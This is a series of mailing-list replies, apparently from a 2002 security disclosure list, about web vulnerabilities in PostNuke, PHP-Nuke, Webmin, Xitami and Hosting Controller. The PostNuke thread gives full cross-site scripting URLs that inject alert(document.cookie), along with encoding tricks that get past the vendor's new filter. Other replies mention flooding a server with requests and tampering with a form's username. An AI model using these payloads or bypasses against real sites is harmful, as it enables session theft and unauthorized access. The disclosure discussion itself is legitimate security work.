Re: Postnuke XSS fixed
Now it is redirecting back to the /index.php on all attempts mentioned previously , No more HTTP VARIABLE Error. Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Re: Postnuke XSS fixed
I just checked it again : http://news.postnuke.com/modules.php?op=modloadname=Newsfile=articlesid=script+alert(document.cookie);/script where + denotes a blank space or similarly this one: http://news.postnuke.com/modules.php?op=modloadname=Newsfile=articlesid=script%20alert(document.cookie);/script resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg. However the request: ?op=modloadname=Newsfile=articlesid=\scriptalert(document.cookie);/script or any character inserted before first script and after first less than resulting in DB Error, revealing nothing (user/pass/path etc). But I used I.E and Netscape, maybe it's different with other browsers. :) Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- Daniel Woods [EMAIL PROTECTED] wrote: Humm! on 26th Sep the following url: http://news.postnuke.com/modules.php ?op=modloadname=Newsfile=articlesid=scriptalert(document.cookie);/script used to give Alert PopUp and Error: DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' at line 23 now it gives: Sorry - $HTTP_GET_VARS contains javascript... Prompt fix by PostNuke team, great work Keep it up! :) Not so fast on the praise :( It only took me a couple of workarounds to find ways to bypass the check. http://news.postnuke.com/modules.php ?op=modloadname=Newsfile=articlesid=scriptalert(document.cookie);/script Using the request... ?op=modloadname=Newsfile=articlesid=\scriptalert(document.cookie);/script gives me the DB Error: message And using the request... ?op=modloadname=Newsfile=articlesid=script+alert(document.cookie);/script gives me the Alert Popup and DB Error: message... the '+' is treated as a blank. Thanks... Dan. _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Postnuke XSS fixed
on 26th Sep the following url: http://news.postnuke.com/modules.php?op=modloadname=Newsfile=articlesid=scriptalert(document.cookie);/script used to give Alert PopUp and Error: DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' at line 23 now it gives: Sorry - $HTTP_GET_VARS contains javascript... Prompt fix by PostNuke team, great work Keep it up! :) Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Re: Yet another XSS vulnerability in PHP NUKE
This XSS issue with the search field has already been discovered and published by Mark Grimes. see the link: http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-09/0289.html Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Re: Webmin Vulnerability Leads to Remote Compromise (RPC CGI)
The problem has been fixed several versions before. Current version is 0.990 However I am using version 0.980 of webmin. And the default installation value for rpc in defaultacl file is 2. [root@linux /]# grep rpc /home/admin/webmin-0.980/defaultacl rpc=2 [root@linux /]# Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by Everyone.net http://www.everyone.net/?btn=tag
Re: Xitami Connection Flood Server Termination Vulnerability
I tried the same method as you suggested on Xitami 2.5b5 for Win32, but my results are a bit different. I recieved following errors: Service Unavailable error It Ignores session request Although i tried it using a perl script flooding the GET requests in a loop, instead of using browser quickie, but yeah i had the maximum number of concurrent sessions value set quiet low, as it was 100 only. But if the bug is in the method of identifying the max sessions and responding to it, then it should work even if it's set as 5. So is it specific to some limit like more than $value number of sessions, or could it be your hardware resources running out while your tests? Regards, - Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by Everyone.net http://www.everyone.net/?btn=tag
Re: Hosting Controller Vulnerability
Instead of using something like @stake web proxy, could you also save the html output of (/accounts/updateuserdesc.asp) locally and change username to administrator and re-submit the form? And how are they validating the user name after applying the patch ? Regards, - Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by Everyone.net http://www.everyone.net/?btn=tag
